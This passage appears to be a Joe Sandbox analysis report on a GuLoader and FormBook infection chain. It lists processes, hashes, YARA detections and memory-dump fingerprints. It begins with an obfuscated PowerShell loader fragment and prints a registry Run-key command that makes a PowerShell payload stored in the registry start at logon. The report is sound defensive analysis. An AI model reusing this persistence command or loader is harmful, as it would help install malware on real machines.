HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
                                Imagebase:0xd10000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2879301889.0000000008910000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2868524375.0000000005C62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2879459016.000000000CE4E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:17:13:15
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
                                Imagebase:0x1c0000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:17
                                Start time:17:13:52
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                Imagebase:0xeb0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:true

                                Target ID:18
                                Start time:17:14:07
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                                Imagebase:0x1c0000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:19
                                Start time:17:14:07
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:20
                                Start time:17:14:07
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                                Imagebase:0xf80000
                                File size:59'392 bytes
                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:21
                                Start time:17:14:38
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe"
                                Imagebase:0x5d0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Has exited:false

                                Target ID:22
                                Start time:17:14:40
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\xcopy.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\xcopy.exe"
                                Imagebase:0x840000
                                File size:43'520 bytes
                                MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Has exited:false

                                Target ID:23
                                Start time:17:14:57
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe"
                                Imagebase:0x5d0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Has exited:false

                                Target ID:24
                                Start time:17:15:02
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                Imagebase:0xeb0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:25
                                Start time:17:15:03
                                Start date:02/05/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                Imagebase:0x7ff78c940000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:26
                                Start time:17:15:10
                                Start date:02/05/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:27
                                Start time:17:15:11
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                Imagebase:0xeb0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true


                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8336d09fb744902b93e6510cce2af8fba6b036a84f85dcd180743832f76099a7
                                  • Instruction ID: f26e5dd6de7e62687ccf2e284c3d7c1362560a7627169e30a11f9e2f3de0bda2
                                  • Opcode Fuzzy Hash: 8336d09fb744902b93e6510cce2af8fba6b036a84f85dcd180743832f76099a7
                                  • Instruction Fuzzy Hash: 9E21C597B0E2B21BFA9153BC69F70EA6BD4EF5326570911B3C588C60A3AD0D2C075592
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \Vqk
                                  • API String ID: 0-619367779
                                  • Opcode ID: b659a3dcb7672a735459380db73dde9bf8396178b76a0317ad46b7e3bef05296
                                  • Instruction ID: 2ba63e257c17172a2f0864732e1e7c3439642134ff10bd1bdae9bdd4127d5613
                                  • Opcode Fuzzy Hash: b659a3dcb7672a735459380db73dde9bf8396178b76a0317ad46b7e3bef05296
                                  • Instruction Fuzzy Hash: 6CB14970E00249CFDF10CFA9C9957AEBBF2AF88715F14812AE815A7355EB749846CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c86072296b232a54bd4df0fcfe82bbca9d43d09c6ee03cf8d5b32652ecf2a0be
                                  • Instruction ID: 7b09c77a11dd753200ce3dab5caa4d3fcf55be979cabf5773a71d4721f636092
                                  • Opcode Fuzzy Hash: c86072296b232a54bd4df0fcfe82bbca9d43d09c6ee03cf8d5b32652ecf2a0be
                                  • Instruction Fuzzy Hash: 17B16D70E00209CFDF10CFA9C9817AEBBF2AF88315F14852AE815A7395EB749845CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8Nqk$h]qk$h]qk$h]qk$Iqk
                                  • API String ID: 0-787822237
                                  • Opcode ID: b60844457a8d76871dc30da3d805793dd2f02af2ed0fa0b85ba8fa812ea3c17a
                                  • Instruction ID: fe76f986b86b38ea3b6dad1529fe7f371cccd96d836424da9b1db726fc76d7e5
                                  • Opcode Fuzzy Hash: b60844457a8d76871dc30da3d805793dd2f02af2ed0fa0b85ba8fa812ea3c17a
                                  • Instruction Fuzzy Hash: 12226D34B02214CFDB65EB24C954AAEB7F6BF89304F1485A9D44AAB391CF359D81CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h]qk$Iqk
                                  • API String ID: 0-2504219488
                                  • Opcode ID: 016bbe8628e0b069041901cdf764712a1ac6666d58af1c6063419a0e4c1c33a1
                                  • Instruction ID: f3a8a952fb4d93bb7c9affef07f49204c0ef7f3499d53362cdf7691718a6eb99
                                  • Opcode Fuzzy Hash: 016bbe8628e0b069041901cdf764712a1ac6666d58af1c6063419a0e4c1c33a1
                                  • Instruction Fuzzy Hash: 21318D30B02218CFCB25EB64C8956EEB7B2BF8A304F1445E9D449AB351CB359E81CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \Vqk
                                  • API String ID: 0-619367779
                                  • Opcode ID: 6231b8d20333e96430e3804e934eb84e2ae7d349efc14ca7c5c4249c5a16b7dd
                                  • Instruction ID: d6f89886f134dd4922fd857a920fd906a6794641fd0a235a16a7c30e293ab521
                                  • Opcode Fuzzy Hash: 6231b8d20333e96430e3804e934eb84e2ae7d349efc14ca7c5c4249c5a16b7dd
                                  • Instruction Fuzzy Hash: B6B16870E00209CFDB10CFA9C99579EBBF2BF88715F14812AE815E7395EB749846CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3f2c3209dc103bd6e89fc13ea792187d93ec82a99809d98c4635887084df64f
                                  • Instruction ID: f69b3635452a472b44562efe74e8a351ead7bf21acfa3b1d706935a2168d3774
                                  • Opcode Fuzzy Hash: d3f2c3209dc103bd6e89fc13ea792187d93ec82a99809d98c4635887084df64f
                                  • Instruction Fuzzy Hash: 136291B4E00315CFEB24DB68C844B9ABBB2AFC5704F148169D50AAB755DB71EC82CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4300ab90a04b5d60a38687e82831f2129479d4327950f1d250765a7e0c381a5
                                  • Instruction ID: d69f1d1e985a4c519fa0d74b2753a5fe63a5e1ad22203b01b6acccc9ce19e6cc
                                  • Opcode Fuzzy Hash: f4300ab90a04b5d60a38687e82831f2129479d4327950f1d250765a7e0c381a5
                                  • Instruction Fuzzy Hash: 9B625CB4B00206DFDB14DBA8C544BAEBBB2AF85744F24C069D90A9F755DB72EC42CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5740ca929654450ed2e86e224d00736b452444346d0b95a521514b65b5cbabf
                                  • Instruction ID: b6c54694fda17ab9dcddc3054d8af6d2c55bee597125b8e6b3e59dacbb669b7c
                                  • Opcode Fuzzy Hash: f5740ca929654450ed2e86e224d00736b452444346d0b95a521514b65b5cbabf
                                  • Instruction Fuzzy Hash: 0B623D74A05249DFDB05CF98D484A9EFBB2FF88310F25815AE844AB352C735ED82CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cc662b7880fb6648909b1a36865b89c0156ab6ddd753de90f096afee5bbb89ef
                                  • Instruction ID: 3c5bddedea36e5bcc559143cff8f46ed4b43734e47914d3ded2e9443f4a81fc6
                                  • Opcode Fuzzy Hash: cc662b7880fb6648909b1a36865b89c0156ab6ddd753de90f096afee5bbb89ef
                                  • Instruction Fuzzy Hash: 353229B4A00206DFDB14CBA8C544B99B7B2BF85714F25C0A9D90AAF755CB72EC82CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b626834704e5073735479dffc098bfce69ed99f1d7d3d9ea8d75e826ada7e6e
                                  • Instruction ID: 8b61fdd5760c2b7eb464e9651d64e55433ea22c70341a7a404527096d982b19a
                                  • Opcode Fuzzy Hash: 0b626834704e5073735479dffc098bfce69ed99f1d7d3d9ea8d75e826ada7e6e
                                  • Instruction Fuzzy Hash: B1123AB4A00206DFDB14CF98C544BAABBB2BF85744F25C069E90A9F355DB72EC46CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 708caf60626fddf0920beca73772bdf399ddc8aa90010441d8ffedf34e962cbf
                                  • Instruction ID: 1fb9b637d6bfb0bbeb1d34db9e765b9bf6d947f0f19e90047e4a8ec25c4dbfd2
                                  • Opcode Fuzzy Hash: 708caf60626fddf0920beca73772bdf399ddc8aa90010441d8ffedf34e962cbf
                                  • Instruction Fuzzy Hash: 4D020C75A00219DFDB15CF98D584AAEBBB2FF88310F24856AE905AB351C771ED41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7955e05f6bc383cffcc90821d7c3d25c474781167756bbac498385c93ed77955
                                  • Instruction ID: b409efe0a1fae43a0dd00e72c4b0b5edae8ca27bec5ca66e8dbc2f2ed1af8226
                                  • Opcode Fuzzy Hash: 7955e05f6bc383cffcc90821d7c3d25c474781167756bbac498385c93ed77955
                                  • Instruction Fuzzy Hash: B9F13F34A05259DFDB05CFA8D490A9EBFB2FF49310F15819AE844AB362C775EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3d3b0a7f57e8fed17c97cdd4cae32c6d1e7e667cfb1ddf9f516752c53f2bbe3
                                  • Instruction ID: db36bba29ef2edaa8ddafa0a986fa2574859e6ce31c46801c9ab757141a01728
                                  • Opcode Fuzzy Hash: f3d3b0a7f57e8fed17c97cdd4cae32c6d1e7e667cfb1ddf9f516752c53f2bbe3
                                  • Instruction Fuzzy Hash: BEF1A1B4A40215DFEB24DB68C854F9ABBB3AFC4344F10C0A9D50AAF791DB71EC818B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e23b89c0905c58d61d4a494d934655077ae3c95d02976a4dd0b03fdcf1f0227c
                                  • Instruction ID: 351b9d463cb71889e7d3a1473243362908e5d66cd2b207511759fe5cdedd41c5
                                  • Opcode Fuzzy Hash: e23b89c0905c58d61d4a494d934655077ae3c95d02976a4dd0b03fdcf1f0227c
                                  • Instruction Fuzzy Hash: C3E1F874A012099FDB45DFA8D484A9DFBF2FF89310F288159E845AB751C771ED81CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a7e02a9167b0d77b25357b7da0ff94a8d76527b8f62c1507c4f7ab793d2b2d2
                                  • Instruction ID: bdca502d371b61e1c30db78c26716813a90c4bd9962c934fe6597c800055e250
                                  • Opcode Fuzzy Hash: 1a7e02a9167b0d77b25357b7da0ff94a8d76527b8f62c1507c4f7ab793d2b2d2
                                  • Instruction Fuzzy Hash: 66D1A0B4A40205EFE718DFA8C454B9EBBA2AFC4744F14C029D506AF795CB71EC52CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 314e33d00b83e16d1743819d2e01ae0b886b4785139fdf3b44a562e38a4ea028
                                  • Instruction ID: fe47bc0722865da7ae615d32a1f80ba98830ce26d89993deac550feafc2f880d
                                  • Opcode Fuzzy Hash: 314e33d00b83e16d1743819d2e01ae0b886b4785139fdf3b44a562e38a4ea028
                                  • Instruction Fuzzy Hash: 1EC19E35A012088FDB14EFA8C544A9DBBF6FF85314F158659E846AF365CB34ED49CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26dd8fb4fb9434b21b1551813392232c0df72308cd5fe5d3786ecece3cc15162
                                  • Instruction ID: 5c6b188b6e2840ec5b235746cf3f764eaeeeefcc9237ae9c5132565b1426f7ae
                                  • Opcode Fuzzy Hash: 26dd8fb4fb9434b21b1551813392232c0df72308cd5fe5d3786ecece3cc15162
                                  • Instruction Fuzzy Hash: 1DD1F778A01249DFDB45DFA8D484A9DFBF2BF88310F248599E854AB361C735ED42CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b6dfb5767e262a9a6dba58e65b328b43b823adbb600b717510139bf79db1477
                                  • Instruction ID: 0f30cffb968b27aa416e8e4c468e1dc4382e39af2706163f5732da8b2722320c
                                  • Opcode Fuzzy Hash: 9b6dfb5767e262a9a6dba58e65b328b43b823adbb600b717510139bf79db1477
                                  • Instruction Fuzzy Hash: 91D11C35E01209DFDB05CFA8D884A9EBBB2FF88311F55815AE804AB356C771ED42CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: de23bf55f884947cb2e78c24b7bb9ee11079f50941af3bdde7af291287739ada
                                  • Instruction ID: 21a34af8192b7206749722f8046e3bc49b94005fe57797553c0b43de40683a30
                                  • Opcode Fuzzy Hash: de23bf55f884947cb2e78c24b7bb9ee11079f50941af3bdde7af291287739ada
                                  • Instruction Fuzzy Hash: 7CB17DB4B00206DBE714DB68C454FAEBBE2AFC8744F108069D506AF791DB72EC51CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9eff8547702266c3157e76dde502390bc44cce995f678f98c0318d391ed8102f
                                  • Instruction ID: 719c20d2121e2230af1fe86e5d14a58076b308af732942edaeb6b7a1b46f1022
                                  • Opcode Fuzzy Hash: 9eff8547702266c3157e76dde502390bc44cce995f678f98c0318d391ed8102f
                                  • Instruction Fuzzy Hash: 77B19BB4A40205EFEB14CFA4C550B9EBBB2AF88744F14C059E5066F395CB71EC46CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14fc79fc32030983621975eb09d61b1b3ebee085213d49bacf88b44701f5076b
                                  • Instruction ID: f2bb3cdded541fa2cc990135b3f310066b26d7f46445f0527954d71db9542683
                                  • Opcode Fuzzy Hash: 14fc79fc32030983621975eb09d61b1b3ebee085213d49bacf88b44701f5076b
                                  • Instruction Fuzzy Hash: C7A16B70E00209DFDB10CFA9C9817DEBBF5AF88315F14852AE815E7395EB749845CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
